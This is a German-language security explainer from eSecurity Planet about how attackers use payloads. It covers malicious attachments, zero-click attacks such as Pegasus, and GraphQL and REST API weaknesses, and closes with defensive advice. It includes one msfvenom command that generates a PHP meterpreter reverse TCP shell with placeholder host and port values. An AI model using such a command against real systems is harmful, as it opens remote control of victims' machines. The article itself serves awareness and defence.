Wie Hacker Payloads nutzen, um Ihren Rechner zu übernehmen

Ein Payload ist ein Stück Code, das ausgeführt wird, wenn Hacker eine Schwachstelle ausnutzen. Mit anderen Worten: Es handelt sich um ein Exploit-Modul. Es besteht in der Regel aus einigen Befehlen, die auf dem angegriffenen Betriebssystem ausgeführt werden (z. B. Keylogger), um Daten zu stehlen und andere bösartige Aktionen durchzuführen. Die meisten Angriffe verwenden Payloads, aber es gibt auch einige Angriffe ohne Payload, etwa Phishing-Kampagnen, die keine schädlichen Links enthalten […]

Verfasst von
Julien Maury
Julien Maury
Nov 19, 2021
5 minute read
eSecurity Planet Inhalte und Produktempfehlungen sind redaktionell unabhängig. Wir können Geld verdienen, wenn Sie auf Links zu unseren Partnern klicken. Mehr erfahren

Ein Payload ist ein Stück Code, das ausgeführt wird, wenn Hacker eine Schwachstelle ausnutzen. Mit anderen Worten: Es handelt sich um ein Exploit-Modul. Es besteht in der Regel aus einigen Befehlen, die auf dem angegriffenen Betriebssystem ausgeführt werden (z. B. Keylogger), um Daten zu stehlen und andere bösartige Aktionen durchzuführen.

Die meisten Angriffe verwenden Payloads, aber es gibt auch einige Angriffe ohne Payload, etwa Phishing-Kampagnen, die keine schädlichen Links oder Malware enthalten, sondern auf raffiniertere Täuschungsmanöver wie Spoofing setzen, um ihre Ziele zu täuschen.

So werden Payloads ausgeführt

Schädliche Payloads finden sich nicht selten in E-Mail-Anhängen. Zu den häufigsten Angriffen gehört der Versand von E-Mails mit einer angehängten .pdf-Datei, die einen schädlichen Payload enthält, der eine Hintertür installiert.

Das Opfer lädt die Datei herunter und öffnet sie per Doppelklick, wodurch der Code im Hintergrund ausgelöst wird. Dabei ist zu beachten, dass ein Payload inaktiv bleiben kann, um später ausgeführt zu werden.

Ein Payload kann sich auch in einer nicht ausführbaren Datei wie einem Bild verbergen und später ausgelöst werden. Die meisten Menschen öffnen eine .png-Datei weniger zögerlich als eine .zip- oder .exe-Datei.

Es gibt eine unerschöpfliche Auswahl an Payloads, mit denen Hacker einen Rechner infizieren können. Sie können Payloads sogar über eine grafische Oberfläche erzeugen, beispielsweise mit dem Metasploit-Framework.

Dieses Penetrationtesting kann einen Payload erzeugen und vor allem eingehende Verbindungen mit dem infizierten Rechner simulieren, sobald der Hacker Zugriff hat. Anschließend können sie mit dem Zielrechner interagieren, etwa Screenshots anfertigen, mit dem Dateisystem interagieren oder auf die Webcam zugreifen.

Die anhaltende Anfälligkeit von Nutzern für E-Mail-Bedrohungen macht Tools wie Mitarbeiterschulungen und E-Mail-Gateways zu unverzichtbaren Maßnahmen der Cybersicherheit – siehe dazu unsere Auswahl der besten Cybersicherheitsschulungen für Mitarbeiter und der besten sicheren Web-Gateways.

Advertisement

Payloads und Reverse-TCP-Shells

Metasploit eignet sich gut zum Erzeugen einer Reverse-Shell. Der folgende Befehl erzeugt mit dem Metasploit-Framework eine Reverse-TCP-Shell:

msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > myshell.php

Die Option -p steht für Payload.

Angreifer nutzen ihn, um über eine interaktive Shell die Kontrolle über einen kompromittierten Rechner zu erlangen. Das Ziel wird zum Server und der Angreifer zum Client. Ein Listener ermöglicht es, eine Shell bereitzustellen, über die auf den Computer des Opfers zugegriffen werden kann, sobald das Opfer eine TCP-Verbindung herstellt.

Selbst wenn eine Firewall aktiviert ist, blockiert sie keine ausgehenden TCP-Verbindungen. Der Hacker verwendet auf dem Zielrechner installierte Payloads (z. B. Trojaner) und die TCP-Verbindung, um Code aus der Ferne auszuführen.

Zero-Click-Angriffe und Payloads

Bei den meisten Angriffen muss das Opfer auf etwas klicken, das Malware installiert oder auf eine gefälschte Website umleitet.

Bei Zero-Click-Angriffen ist das nicht nötig. Sie umgehen den menschlichen Faktor, und Sie können nichts dagegen tun. Ein manipulierte Payload wird über eine drahtlose Verbindung wie WLAN, Bluetooth, GSM oder LTE an das Zielgerät gesendet und ausgeführt.

Dabei werden in der Regel nicht gepatchte und unbekannte Schwachstellen in Software ausgenutzt (sogenannte „Zero-Day“-Bedrohungen), sodass kein Schutz und keine forensische Maßnahme möglich ist. Solche Hacker machen sich nicht die Mühe, Social Engineering oder komplexe Szenarien einzusetzen, die nur eine geringe Erfolgsquote bieten. Sie haben bereits Hintertüren.

Vielleicht haben Sie schon von der von der NSO Group entwickelten Pegasus-Software gehört. Diese Software nutzt Zero-Days in beliebten und standardmäßig installierten Anwendungen wie WhatsApp, Telegram, Skype oder iMessage aus. Sie kann sogar die Firmware des Chips angreifen und Root-Zugriff auf dem Gerät ermöglichen, wodurch mehr Berechtigungen und Möglichkeiten als für den Nutzer verfügbar sind.

Advertisement

Solche Angriffe können ziemlich teuer sein, und die angegriffene Software wird schließlich gepatcht. Sie könnten daher denken, dass das Risiko relativ gering ist – und in vielen Fällen haben Sie damit wahrscheinlich recht.

Dennoch ist es sinnvoll, hochsensible Daten in Unternehmen oder anderen schützenswerten Umgebungen zu sichern. Außerdem suchen und finden Cyberakteure kontinuierlich neue Zero-Days, die sie ausnutzen können. Wachsamkeit und eine starke defensive Haltung sind daher stets erforderlich.

Die Gefahr unsicherer API-Endpunkte

Gegen Zero-Days können Sie nicht viel unternehmen, aber Sie können Ihre eigenen API-Endpunkte überprüfen. Eine API ist eine Schnittstelle für Programmierer. Sie stellt wertvolle Daten bereit, die von Anwendungen genutzt werden können. Die meisten Unternehmen verwenden RESTful-APIs, aber GraphQL ist in den vergangenen Jahren sehr beliebt geworden.

REST ist eine standardisierte Client-Server-Architektur für APIs, bei der Ressourcen unter bestimmten URLs abgerufen werden können. Der Client kann REST-APIs nutzen, um Daten abzurufen (GET), aber auch, um neue Einträge zu erstellen, bestehende zu ändern (POST, PUT) und einige zu löschen (DELETE).

Das URI-Design folgt Standards und Konventionen. Jede Ressource kann über bestimmte Endpunkte abgerufen werden. Wenn ich beispielsweise alle Bestellungen möchte, kann ich https://myapi.com/v1/orders abrufen; für eine bestimmte Bestellung würde ich stattdessen https://myapi.com/v1/orders/1001001 verwenden, wobei 1001001 die Bestell-ID ist.

Bestelldaten sollten aus offensichtlichen Gründen nicht öffentlich sein, und der Endpunkt sollte regelmäßig getestet werden. Andernfalls finden Hacker möglicherweise einen Weg, Ressourcen zu lesen, hinzuzufügen, zu ändern oder zu löschen, indem sie manipulierte Payloads senden.

GraphQL verfolgt einen anderen Ansatz: Es gibt nur einen Endpunkt, an den mehrere Anfragen übergeben werden können und über dessen komfortable Syntax sich Daten einfach per Cross-Join verknüpfen lassen. GraphQL bietet viele weitere Vorteile, etwa eine bessere Datenvalidierung durch strengere Typen, und macht durchaus Spaß in der Nutzung. Allerdings kann es Sicherheitsprobleme verursachen:

  • Die standardmäßige /graphql-Endpunkt-URL wird massiv genutzt und ist daher ein Ziel
  • Die Introspektionsfunktion gibt nicht öffentliche Informationen preis und ist in Produktionsumgebungen manchmal versehentlich aktiviert
  • Eine zu große Abfragetiefe kann zu Überlastungen führen, die einen selbst verursachten DDoS (Distributed Denial of Service) auslösen
  • Autorisierungsfehler sind aufgrund der Komplexität des GraphQL-Schemas relativ häufig
Advertisement

Hacker werden Ihren GraphQL-Endpunkt wahrscheinlich auf die Probe stellen. Wenn Sie keine öffentliche Plattform wie GitHub betreiben, sollten Sie Ihre GraphQL-APIs vermutlich nicht öffentlich zugänglich machen.

Seien Sie besonders vorsichtig mit der Ratenbegrenzung, unabhängig davon, ob Sie RESTful- oder GraphQL-APIs verwenden. Sie ist ein kritischer Punkt, der die Infrastruktur Ihres Servers lahmlegen kann.

So schützen Sie sich vor Payloads

Sie können alle grundlegenden Tipps für eine gute Sicherheitshygiene befolgen – dazu gehört natürlich, nicht blind auf E-Mail-Anhänge und Links zu klicken. Außerdem sollten Sie regelmäßig Penetrationstests durchführen und Schwachstellen patchen.

Halten Sie Ihre APIs sicher, denn das ist für Ihr Unternehmen von entscheidender Bedeutung. Das setzt voraus, dass Entwickler nur robuste Technologien einsetzen, die sie beherrschen, und nicht angesagte Frameworks, die bei falscher Konfiguration oder fehlerhafter Implementierung Sicherheitsprobleme verursachen können.

Weiterführende Lektüre: Top-Tools für Code-Debugging und Codesicherheit

Julien Maury

eSecurity Planet contributor Julien Maury writes about penetration testing, code security, open source security and more. He is a backend developer, a mentor and a technical writer who enjoys sharing his knowledge and learning new concepts.

eSecurity Planet Logo

eSecurity Planet is a leading resource for IT professionals at large enterprises who are actively researching cybersecurity vendors and latest trends. eSecurity Planet focuses on providing instruction for how to approach common security challenges, as well as informational deep-dives about advanced cybersecurity topics.

Eigentum von TechnologyAdvice. © 2026 TechnologyAdvice. Alle Rechte vorbehalten

Werbetreibenden-Offenlegung: Einige der auf dieser Website erscheinenden Produkte stammen von Unternehmen, von denen TechnologyAdvice eine Vergütung erhält. Diese Vergütung kann beeinflussen, wie und wo Produkte auf dieser Website erscheinen, einschließlich beispielsweise der Reihenfolge, in der sie erscheinen. TechnologyAdvice schließt nicht alle Unternehmen oder alle auf dem Marktplatz verfügbaren Produkttypen ein.